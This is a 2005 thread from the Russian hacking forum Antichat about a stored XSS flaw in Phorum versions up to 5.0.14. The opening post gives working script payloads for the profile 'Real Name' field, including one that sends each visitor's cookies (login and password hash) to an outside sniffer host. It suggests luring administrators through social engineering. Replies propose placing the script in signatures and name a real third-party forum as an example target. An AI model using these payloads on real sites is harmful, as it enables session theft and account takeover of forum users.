Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   XSS в Phorum<=5.0.14 (https://forum.antichat.xyz/showthread.php?t=5495)

tester2005 16.03.2005 10:28

XSS в Phorum<=5.0.14
 
CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:
Код:

Вовочка<script>alert(document.cookie)</script>
Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно:)
Теперь как можно употребить на других,
В поле Real Nаme вставим:
Код:

Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
Или че то подобное, где URL это адрес снифера. :)
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.:)
Теперь, подделка куков, :( жаль не сработала, вчера пыхтел любыми путями, не получилось:( Может у кого другого получитса, дай знать:). Братец KEZ от снеми видео, еси такое дело с куками провернётса:)
Просто этот форум времмено содержит куки, которые через некоторое время уничтажаютса, что требует повторной авторизации.

White Jordan 16.03.2005 11:16

Ну давай ссылку что нам гадать в чём проблема чтоли?

White Jordan 16.03.2005 15:54

Хотя если честно, то Я проблему знаю. Мне просто ссылка нужна. Ссылку давай короче.

PinkPanther 16.03.2005 15:59

Цитата:

Сообщение от tester2005
CyberLords тима, обнаружила данную XSS в форумах Phorum до 5.0.14 версии.

Я эту фишку уже как 2 недели назад просек.
Цитата:

Сообщение от tester2005
Суть уязвимости в том что за регавшись на форуме, в контрольном меню можно ввести прозивольную XSS.
А точнее заходим в раздел редактирования профиля My Profile-->Edit My Profile
В поле Real Name вводим имя затем XSS, пример:
Код:

Вовочка<script>alert(document.cookie)</script>
Сохраняем, при просмотре профиля выскачит окно с вашими куками, точенее ваш логин и MD5 хеш, то что нам нужно:)Теперь как можно употребить на других,
В поле Real Nаme вставим:
Код:

Вовочка<script>img = new Image(); img.src = "http://site.com/снифер/сниф.jpg?"+document.cookie;</script>
Или че то подобное, где URL это адрес снифера. :)
Теперь каждый юзверь при просмотре вашего профиля отсылает на лог снифера свой логин и хеш МД5.
Вопрос как заманить нужную жертву (админ или модер) на ваш профиль...это дело соц. инженерии.:)

Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=)
Цитата:

Сообщение от tester2005
Теперь, подделка куков, :( жаль не сработала, вчера пыхтел любыми путями, не получилось:( Может у кого другого получитса, дай знать:). Братец KEZ от снеми видео, еси такое дело с куками провернётса:)

Да, с подделкой действительно траблы, так что тут приходится все рассшифровывать.

PinkPanther 16.03.2005 16:01

Если никто не против, на днях сделаю видео.

White Jordan 16.03.2005 16:01

Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.

PinkPanther 16.03.2005 16:09

Цитата:

Сообщение от White Jordan
Никаких трабл ну! Ссылку давайте Я знаю в чём ваша ошибка.

Ну возьми этот к примеру: http://www.recipe.ru/forum/

tester2005 16.03.2005 18:20

Цитата:

Сообщение от PinkPanther
Да её и заманивать никуда не недо , вставляешь скрипт в поле подписи, и просто гуляешь по форуму=)

Вроде в поле "подписи" эту уязвимость я не заметил,
ты о чем??

Цитата:

Сообщение от PinkPanther
Если никто не против, на днях сделаю видео.

а кто против?, античату да и всем наоборот лучше :)

KEZ 16.03.2005 20:14

Ну и форум... Что это за форум на котором можно ставить <script>

tester2005 16.03.2005 21:00

Цитата:

Сообщение от KEZ
Ну и форум... Что это за форум на котором можно ставить <script>

бывает..;)

эх, был бы выход куки подделать..


Время: 22:18